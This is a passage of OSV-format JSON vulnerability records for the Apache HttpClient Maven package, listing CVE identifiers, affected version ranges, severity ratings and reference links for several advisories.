"4.0-alpha2", "4.0-alpha3", "4.0-alpha4", "4.0-beta1", "4.0-beta2", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1", "4.1.1", "4.1.2", "4.1.3", "4.2", "4.2-alpha1", "4.2-beta1", "4.2.1", "4.2.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-2x83-r56g-cv47/GHSA-2x83-r56g-cv47.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6153" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/6e14fc146a66e0f3eb362f45f95d1a58ee18886a" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/b930227f907af1198765fc47beabbddae344ca7b" }, { "type": "WEB", "url": "https://access.redhat.com/solutions/1165533" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1129916" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2x83-r56g-cv47" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05103564" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1098.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1833.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1834.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1835.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1836.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1891.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1892.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0125.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0158.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0675.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0720.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0765.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0850.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0851.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1888.html" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1411705" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2769-1" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:53:18Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-7r82-7xv7-xcpj", "published": "2021-06-03T23:40:23Z", "modified": "2024-03-15T05:19:17.323914Z", "aliases": [ "CVE-2020-13956" ], "related": [ "CGA-6936-26rm-54qh", "CGA-7v36-x4w2-722q" ], "summary": "Cross-site scripting in Apache HttpClient", "details": "Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.5.13" } ] } ], "versions": [ "4.0", "4.0-alpha1", "4.0-alpha2", "4.0-alpha3", "4.0-alpha4", "4.0-beta1", "4.0-beta2", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1", "4.1.1", "4.1.2", "4.1.3", "4.2", "4.2-alpha1", "4.2-beta1", "4.2.1", "4.2.2", "4.2.3", "4.2.4", "4.2.5", "4.2.6", "4.3", "4.3-alpha1", "4.3-beta1", "4.3-beta2", "4.3.1", "4.3.2", "4.3.3", "4.3.4", "4.3.5", "4.3.6", "4.4", "4.4-alpha1", "4.4-beta1", "4.4.1", "4.5", "4.5.1", "4.5.10", "4.5.11", "4.5.12", "4.5.2", "4.5.3", "4.5.4", "4.5.5", "4.5.6", "4.5.7", "4.5.8", "4.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7r82-7xv7-xcpj/GHSA-7r82-7xv7-xcpj.json" } }, { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7r82-7xv7-xcpj/GHSA-7r82-7xv7-xcpj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13956" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re504acd4d63b8df2a7353658f45c9a3137e5f80e41cf7de50058b2c1@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5ab56beb2ac6879f6ab427bc4e5f7691aed8362d17b713f61779858@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd9ad5dda60c82ab0d0c9bd3e9cb1dc740804451fc20c7f451ef5cc4@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcced7ed3237c29cd19c1e9bf465d0038b8b2e967b99fc283db7ca553@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc990e2462ec32b09523deafb2c73606208599e196fa2d7f50bdbc587@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc5c6ccb86d2afe46bbd4b71573f0448dc1f87bbcd5a0d8c7f8f904b2@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc505fee574fe8d18f9b0c655a4d120b0ae21bb6a73b96003e1d9be35@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc3739e0ad4bcf1888c6925233bfc37dd71156bbc8416604833095c42@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0863892ccfd9fd0d0ae10091f24ee769fb39b8957fe4ebabfc11f17@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb725052404fabffbe093c83b2c46f3f87e12c3193a82379afbc529f8@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb4ba262d6f08ab9cf8b1ebbcd9b00b0368ffe90dad7ad7918b4b56fc@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae14ae25ff4a60251e3ba2629c082c5ba3851dfd4d21218b99b56652@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad6222134183046f3928f733bf680919e0c390739bfbfe6c90049673@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra8bc6b61c5df301a6fe5a716315528ecd17ccb8a7f907e24a47a1a5e@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rea3dbf633dde5008d38bf6600a3738b9216e733e03f9ff7becf79625@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree942561f4620313c75982a4e5f3b74fe6f7062b073210779648eec2@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reef569c2419705754a3acf42b5f19b2a158153cef0e448158bc54917@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf03228972e56cb4a03e6d9558188c2938078cf3ceb23a3fead87c9ca@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf43d17ed0d1fb4fb79036b582810ef60b18b1ef3add0d5dea825af1e@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf4db88c22e1be9eb60c7dc623d0528642c045fb196a24774ac2fa3a3@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf7ca60f78f05b772cc07d27e31bcd112f9910a05caf9095e38ee150f@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb35f6db9ba1f1e061b63769a4eff5abadcc254ebfefc280e5a0dcf1@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfbedcb586a1e7dfce87ee03c720e583fc2ceeafa05f35c542cecc624@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc00884c7b7ca878297bffe45fcb742c362b00b26ba37070706d44c3@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0002" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4850b3fbaea02fde2886e461005e4af8d37c80a48b3ce2a6edca0e30@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f740e4c38bba1face49078aa5cbeeb558c27be601cc9712ad2dcd1e@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3cecd59fba74404cbf4eb430135e1080897fb376f111406a78bed13a@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r34efec51cb817397ccf9f86e25a75676d435ba5f83ee7b2eabdad707@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r34178ab6ef106bc940665fd3f4ba5026fac3603b3fa2aefafa0b619d@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2dc7930b43eadc78220d269b79e13ecd387e4bee52db67b2f47d4303@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a03dc210231d7e852ef73015f71792ac0fcaca6cccc024c522ef17d@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2835543ef0f91adcc47da72389b816e36936f584c7be584d2314fac3@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e4c6a560cfc519caa1aaee63bdd4036327610eadbd89f76dd5457@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r12cb62751b35bdcda0ae2a08b67877d665a1f4d41eee0fa7367169e0@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0bebe6f9808ac7bdf572873b4fa96a29c6398c90dab29f131f3ebffe@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0a75b8f0f72f3e18442dc56d33f3827b905f2fe5b7ba48997436f5d1@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06cf3ca5c8ceb94b39cd24a73d4e96153b485a7dac88444dd876accb@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r043a75acdeb52b15dd5e9524cdadef4202e6a5228644206acf9363f9@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r03bbc318c81be21f5c8a9b85e34f2ecc741aa804a8e43b0ef2c37749@%3Cissues.maven.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/httpcomponents-client" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra539f20ef0fb0c27ee39945b5f56bf162e5c13d1c60f7344dab8de3b@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e52a6c72c8365000ecd035e48cc9fee5a677a150350d4420c46443d@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8aa1e5c343b89aec5b69961471950e862f15246cb6392910161c389b@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r87ddc09295c27f25471269ad0a79433a91224045988b88f0413a97ec@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70c429923100c5a4fae8e5bc71c8a2d39af3de4888f50a0ac3755e6f@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6eb2dae157dbc9af1f30d1f64e9c60d4ebef618f3dce4a0e32d6ea4d@%3Ccommits.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dab7da30f8bf075f79ee189e33b45a197502e2676481bb8787fc0d7%40%3Cdev.hc.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d672b46622842e565e00f6ef6bef83eb55d8792aac2bee75bff9a2a@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a3cda38d050ebe13c1bc9a28d0a8ec38945095d07eca49046bcb89f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r69a94e2f302d1b778bdfefe90fcb4b8c50b226438c3c8c1d0de85a19@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r63296c45d5d84447babaf39bd1487329d8a80d8d563e67a4b6f3d8a7@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5fec9c1d67f928179adf484b01e7becd7c0a6fdfe3a08f92ea743b90@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5de3d3808e7b5028df966e45115e006456c4e8931dc1e29036f17927@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b55f65c123a7481104d663a915ec45a0d103e6aaa03f42ed1c07a89@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55b2a1d1e9b1ec9db792b93da8f0f99a4fd5a5310b02673359d9b4d1@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r549ac8c159bf0c568c19670bedeb8d7c0074beded951d34b1c1d0d05@%3Cdev.drill.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2021-04-12T22:25:52Z", "nvd_published_at": "2020-12-02T17:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cfh5-3ghh-wfjx", "published": "2018-10-17T00:05:06Z", "modified": "2024-12-03T06:09:02.246830Z", "aliases": [ "CVE-2014-3577" ], "summary": "Improper Verification of Cryptographic Signature in org.apache.httpcomponents:httpclient", "details": "org.apache.http.conn.ssl.AbstractVerifier in Apache HttpComponents HttpClient before 4.3.5 and HttpAsyncClient before 4.0.2 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a \"CN=\" string in a field in the distinguished name (DN) of a certificate, as demonstrated by the \"foo,CN=www.apache.org\" string in the O field.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.3.5" } ] } ], "versions": [ "4.0", "4.0-alpha1", "4.0-alpha2", "4.0-alpha3", "4.0-alpha4", "4.0-beta1", "4.0-beta2", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1", "4.1.1", "4.1.2", "4.1.3", "4.2", "4.2-alpha1", "4.2-beta1", "4.2.1", "4.2.2", "4.2.3", "4.2.4", "4.2.5", "4.2.6", "4.3", "4.3-alpha1", "4.3-beta1", "4.3-beta2", "4.3.1", "4.3.2", "4.3.3", "4.3.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cfh5-3ghh-wfjx/GHSA-cfh5-3ghh-wfjx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3577" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/51cc67567765d67f878f0dcef61b5ded454d3122" }, { "type": "WEB", "url": "https://svn.apache.org/viewvc?view=revision\u0026revision=1614064" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231027-0003" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff42cfa5e7d75b7c1af0e37589140a8f1999e578a75738740b244bd4@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc774278135816e7afc943dc9fc78eb0764f2c84a2b96470a0187315c@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36e44ffc1a9b365327df62cdfaabe85b9a5637de102cea07d79b2dbf@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/httpcomponents-client" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-cfh5-3ghh-wfjx" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95327" }, { "type": "WEB", "url": "https://access.redhat.com/solutions/1165533" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00032.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00033.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/127913/Apache-HttpComponents-Man-In-The-Middle.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1146.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1166.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1833.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1834.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1835.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1836.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1891.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1892.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0125.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0158.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0675.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0720.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0765.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0850.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0851.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1176.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1177.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1888.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1773.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1931.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2014/Aug/48" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/10/06/1" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2769-1" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:31:17Z", "nvd_published_at": "2014-08-21T14:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-fmj5-wv96-r2ch", "published": "2018-10-17T00:05:29Z", "modified": "2024-12-08T05:23:13.492634Z", "aliases": [ "CVE-2015-5262" ], "summary": "Denial of service vulnerability in org.apache.httpcomponents:httpclient", "details": "http/conn/ssl/SSLConnectionSocketFactory.java in Apache HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.3.6" } ] } ], "versions": [ "4.0", "4.0-alpha1", "4.0-alpha2", "4.0-alpha3", "4.0-alpha4", "4.0-beta1", "4.0-beta2", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1", "4.1.1", "4.1.2", "4.1.3", "4.2", "4.2-alpha1", "4.2-beta1", "4.2.1", "4.2.2", "4.2.3", "4.2.4", "4.2.5", "4.2.6", "4.3", "4.3-alpha1", "4.3-beta1", "4.3-beta2", "4.3.1", "4.3.2", "4.3.3", "4.3.4", "4.3.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-fmj5-wv96-r2ch/GHSA-fmj5-wv96-r2ch.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5262" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1261538" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-fmj5-wv96-r2ch" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HTTPCLIENT-1478" }, { "type": "WEB", "url": "https://jenkins.io/security/advisory/2018-02-26" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/167962.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/167999.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/168030.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00032.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00033.html" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1626784" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1033743" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2769-1" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:55Z", "nvd_published_at": "2015-10-27T16:59:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-gw85-4gmf-m7rh", "published": "2022-05-17T05:39:03Z", "modified": "2024-12-03T06:01:01.943495Z", "aliases": [ "CVE-2011-1498" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache HttpClient", "details": "Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.1" } ] } ], "versions": [ "4.0", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-gw85-4gmf-m7rh/GHSA-gw85-4gmf-m7rh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-1498" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/a572756592c969affd0ce87885724e74839176fb" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=709531" }, { "type": "PACKAGE", "url": "https://github.com/apache/httpcomponents-client" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HTTPCLIENT-1061" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061440.html" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129853896315461\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129856318011586\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129857589129183\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129858274406594\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129858299106950\u0026w=2" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2011/04/07/7" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2011/04/08/1" }, { "type": "WEB", "url": "http://securityreason.com/securityalert/8298" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2022-07-13T17:20:15Z", "nvd_published_at": "2011-07-07T21:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-pqwh-44jj-p5rm", "published": "2022-05-13T01:25:03Z", "modified": "2024-03-05T17:33:19.157465Z", "aliases": [ "CVE-2013-4366" ], "summary": "Hostname verification in Apache HttpClient 4.3 was disabled by default", "details": "http/impl/client/HttpClientBuilder.java in Apache HttpClient 4.3.x before 4.3.1 does not ensure that X509HostnameVerifier is not null, which allows attackers to have unspecified impact via vectors involving hostname verification.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.3" }, { "fixed": "4.3.1" } ] } ], "versions": [ "4.3" ], "database_specific": { "source": 